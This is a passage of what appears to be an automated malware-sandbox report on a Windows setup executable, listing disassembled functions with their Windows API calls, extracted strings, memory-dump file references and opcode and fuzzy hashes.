                                                                                                                                                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 004C094D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Message$CapturePost$PeekRelease
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1125932295-0
                                                                                                                                                                                                  • Opcode ID: eb9470a3fcd4891bba1e541f97852db2b0f8aa8aa42ac36aafec1163a5b5647f
                                                                                                                                                                                                  • Instruction ID: 52065f0c73146e226af49c9f6bd28d898a39446346474a50d6bf028ca8db87e0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb9470a3fcd4891bba1e541f97852db2b0f8aa8aa42ac36aafec1163a5b5647f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF0F430600708BFD6306F26EC48E177FBCFB81748B41062EF14242611D736E5018A38
                                                                                                                                                                                                  Function 0049C8E9 Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000103,7FFFFFFF,0049AC26,0049AB49,00000000,?,?,00000000,00000001), ref: 0049C8EB
                                                                                                                                                                                                  • TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0049C8F9
                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0049C945
                                                                                                                                                                                                    • Part of subcall function 00499EC2: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,0049C90E,00000001,00000074,?,?,00000000,00000001), ref: 00499FB8
                                                                                                                                                                                                  • TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 0049C91D
                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0049C92E
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2020098873-0
                                                                                                                                                                                                  • Opcode ID: 728b2e406d9662b3daca5c713c27d1c6331d9942989162d037ea912c5b7fd59a
                                                                                                                                                                                                  • Instruction ID: 02134c09d96806edb1ce9383c971cebc2a5d1ceeafcdf693ea1ec644ca7c71ce
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 728b2e406d9662b3daca5c713c27d1c6331d9942989162d037ea912c5b7fd59a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93F09631501721ABDB212B25AC09B2B3F54EF00775710063AF941962F1DB6888019A99
                                                                                                                                                                                                  Function 004C437F Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 004C4399
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000021), ref: 004C43B2
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000005), ref: 004C43C6
                                                                                                                                                                                                  • InflateRect.USER32(?,00000000), ref: 004C43CD
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsRectSystem$AdjustInflateWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4080371637-0
                                                                                                                                                                                                  • Opcode ID: e450b1ea20e8b385e92255fcb816b920db64138bc9d05819fd9d4f2063a771c8
                                                                                                                                                                                                  • Instruction ID: f3b5b6be49cef8182e00ad75972e18ff325e7c96475021207ce59f40245c6238
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e450b1ea20e8b385e92255fcb816b920db64138bc9d05819fd9d4f2063a771c8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFF0C835341294BBE7509B95DE09F6E3B58DB50710F04801ABE095A1E0C7745910DFAA
                                                                                                                                                                                                  Function 0041C393 Relevance: 7.5, APIs: 5, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • AttachConsole.KERNEL32(?), ref: 0041C39E
                                                                                                                                                                                                  • GenerateConsoleCtrlEvent.KERNEL32(00000001,?), ref: 0041C3AE
                                                                                                                                                                                                  • FreeConsole.KERNEL32 ref: 0041C3B6
                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00001770), ref: 0041C3C8
                                                                                                                                                                                                  • TerminateProcess.KERNEL32(?,00000001), ref: 0041C3DF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Console$AttachCtrlEventFreeGenerateObjectProcessSingleTerminateWait
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1848478052-0
                                                                                                                                                                                                  • Opcode ID: fdee16bfe9d2d86ac9841e1308da5e281162cb2bb2986ac1b596b3f92fcaa4be
                                                                                                                                                                                                  • Instruction ID: 5896004366eb8f4b653af84ae7d5d37ffa16aa7ae703d54d6a6e70a51499b322
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fdee16bfe9d2d86ac9841e1308da5e281162cb2bb2986ac1b596b3f92fcaa4be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0CF03A71244205AFE7101F62EC88F96BBA6BB00755F00C83AF955D26B0C7F9E8918B08
                                                                                                                                                                                                  Function 00491DDA Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00491DDF
                                                                                                                                                                                                    • Part of subcall function 0048EE23: __EH_prolog.LIBCMT ref: 0048EE28
                                                                                                                                                                                                    • Part of subcall function 0048F339: __EH_prolog.LIBCMT ref: 0048F33E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: Missing ',' or '}' in object declaration$Missing ':' after object member name$Missing '}' or object member name
                                                                                                                                                                                                  • API String ID: 3519838083-3980781130
                                                                                                                                                                                                  • Opcode ID: c1c9d5f3be0390123a207f77d977832238099d7d7e35d800a8f6910004c3188b
                                                                                                                                                                                                  • Instruction ID: 6a0c180941d8d4d700cc4af718e5ce6e2fcf85a96033dbb7c25faebe173d8375
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c1c9d5f3be0390123a207f77d977832238099d7d7e35d800a8f6910004c3188b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 98C1FF30904248EECF24EBA1C556AEEBF78AF11314F14406FF85677286DA7C4B49CB29
                                                                                                                                                                                                  Function 004B887A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GlobalLock.KERNEL32(?), ref: 004B8895
                                                                                                                                                                                                  • lstrlenW.KERNEL32(00000000), ref: 004B88DF
                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004B8976
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Global$LockUnlocklstrlen
                                                                                                                                                                                                  • String ID: System
                                                                                                                                                                                                  • API String ID: 1794151802-3470857405
                                                                                                                                                                                                  • Opcode ID: 45d4ce6010c160a4a427d08c90295743c021812c5b86f8d8abfce8ba5614e610
                                                                                                                                                                                                  • Instruction ID: 00e1cc0ab22a96276ab0e4c66809288a09e7f605c82473ae58eb7ac6ec52dafd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 45d4ce6010c160a4a427d08c90295743c021812c5b86f8d8abfce8ba5614e610
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7531C675800216DBCF14DF68C8855FE7BB8FF00304F54816ED815AB254D7399946CB99
                                                                                                                                                                                                  Function 004C44FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 004C4538
                                                                                                                                                                                                    • Part of subcall function 004B5758: SetWindowPos.USER32(?,00000000,?,00000014,?,?,?,?,004021A9,00000000,?,?,?,?,00000014), ref: 004B577F
                                                                                                                                                                                                  • GetWindowLongW.USER32(C0850000,000000F0), ref: 004C45D5
                                                                                                                                                                                                  • UpdateWindow.USER32(?), ref: 004C45EE
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$LongParentUpdate
                                                                                                                                                                                                  • String ID: P
                                                                                                                                                                                                  • API String ID: 1906497633-3110715001
                                                                                                                                                                                                  • Opcode ID: 6594fa3239d2cd0a19eb978beb7ae89f1ecedb22a16269624737e05a8230e2a0
                                                                                                                                                                                                  • Instruction ID: 2e7ce613fdd664413651c357c71a513fdd5583651df9c7bdeb529e4ce43d0c54
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6594fa3239d2cd0a19eb978beb7ae89f1ecedb22a16269624737e05a8230e2a0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1A31DEB5200709BBDB619F21DD58FAE7BA9FF80714F00052EFA42562A1CB399D10CB68
                                                                                                                                                                                                  Function 00438196 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: aac_adtstoasc$concat:$copy
                                                                                                                                                                                                  • API String ID: 3519838083-2592638280
                                                                                                                                                                                                  • Opcode ID: 385adcddf67bbd7d6f77071224798933e3dca607932c2b4f99f1162f150c5496
                                                                                                                                                                                                  • Instruction ID: 8f045303ce01ab06eb8329de2e53be223cbe13808d2a416d48b03fb7f6d97beb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 385adcddf67bbd7d6f77071224798933e3dca607932c2b4f99f1162f150c5496
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0031A23090011A9BCF24EF66C891EEEF770EF14318F10449EB455A3191EB786A45CB95
                                                                                                                                                                                                  Function 0041CC3A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041CC3F
                                                                                                                                                                                                    • Part of subcall function 0041C696: __EH_prolog.LIBCMT ref: 0041C69B
                                                                                                                                                                                                    • Part of subcall function 0041CE46: lstrlenW.KERNEL32(00000000), ref: 0041CE5D
                                                                                                                                                                                                    • Part of subcall function 0041CE46: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 0041CE76
                                                                                                                                                                                                    • Part of subcall function 0041CE46: RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 0041CE92
                                                                                                                                                                                                    • Part of subcall function 0041CE46: RegCloseKey.ADVAPI32(?), ref: 0041CEA2
                                                                                                                                                                                                    • Part of subcall function 0041CE46: RegDeleteKeyW.ADVAPI32(?,00000000), ref: 0041CEB0
                                                                                                                                                                                                    • Part of subcall function 004B1F26: InterlockedDecrement.KERNEL32(-000000F4), ref: 004B1F3A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog$CloseDecrementDeleteEnumInterlockedOpenlstrlen
                                                                                                                                                                                                  • String ID: %s\DefaultIcon$%s\shell\open\%s$command
                                                                                                                                                                                                  • API String ID: 789564858-2593464833
                                                                                                                                                                                                  • Opcode ID: 56e555a6971960f43327c406da320ae949e7ffa2efec88c965a4d083605f1776
                                                                                                                                                                                                  • Instruction ID: fec8b11ba4b10b2e7b6c4babc4b1b5085061928872d7e27d56e5a6500f68e4f1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56e555a6971960f43327c406da320ae949e7ffa2efec88c965a4d083605f1776
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31A170A40249EFCF00EBA5CD91AEEBBB9AF08304F10446EF015A3261C73C5E44DB69
                                                                                                                                                                                                  Function 004C5026 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 004C5032
                                                                                                                                                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 004C50E1
                                                                                                                                                                                                  • LoadBitmapW.USER32(00000000,00007FE3), ref: 004C50F9
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2596413745-3916222277
                                                                                                                                                                                                  • Opcode ID: b0b26ef09b01f33c307c11c67eb990ecd7e1ce4f05c16f58a849ef120345332c
                                                                                                                                                                                                  • Instruction ID: cd1c9671a03333e4aec7101ade37b985362a8fcd17bad1f24785a9de7211e845
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0b26ef09b01f33c307c11c67eb990ecd7e1ce4f05c16f58a849ef120345332c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F4213A76E00215AFEB10CB79CC89FAE7BB4EB44714F05416AE505EB382D774AA44CB94
                                                                                                                                                                                                  Function 0043D300 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SizeofResource.KERNEL32(?,?,00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D328
                                                                                                                                                                                                  • LoadResource.KERNEL32(?,?,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D332
                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,?,74DE1F60,00435218,00000000,?,00000003), ref: 0043D33D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Unable to load resource!, xrefs: 0043D382
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                  • String ID: Unable to load resource!
                                                                                                                                                                                                  • API String ID: 2853612939-3921374161
                                                                                                                                                                                                  • Opcode ID: 9d8ec5a6353fa18ddccf2d86107076021da45e9bf48ecd02208cdbcf78f8e2d1
                                                                                                                                                                                                  • Instruction ID: 49d7a7b901b44406962a5e494d930b75bd3da6f0b920210d31b361e2e7177845
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d8ec5a6353fa18ddccf2d86107076021da45e9bf48ecd02208cdbcf78f8e2d1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E111D372604240AFC7049F6ADC40B6BBBE8FB9A720F44062EF916C32D1DB789C05C765
